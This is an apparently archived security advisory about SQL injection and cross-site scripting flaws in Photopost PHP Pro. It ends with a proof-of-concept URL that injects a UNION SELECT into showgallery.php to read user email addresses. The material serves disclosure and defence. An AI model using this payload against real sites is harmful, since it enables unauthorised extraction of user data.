8 lines
No EOL
635 B
Text
8 lines
No EOL
635 B
Text
source: http://www.securityfocus.com/bid/9994/info
|
|
|
|
Multiple SQL injection, cross-site scripting and HTML injection vulnerabilities have been identified in the application, which may allow an attacker to execute arbitrary HTML or script code in a user's browser and/or influence SQL query logic to disclose sensitive information and carry out other attacks.
|
|
|
|
Photopost PHP Pro 4.6.0 and prior may be prone to these issues. Photopost PHP Pro 4.8.1 is reported vulnerable to these issues as well.
|
|
|
|
http://www.example.com/showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,
|
|
0,0,0,0,0,0%20FROM%20user%20WHERE%20userid='1&cat=500 |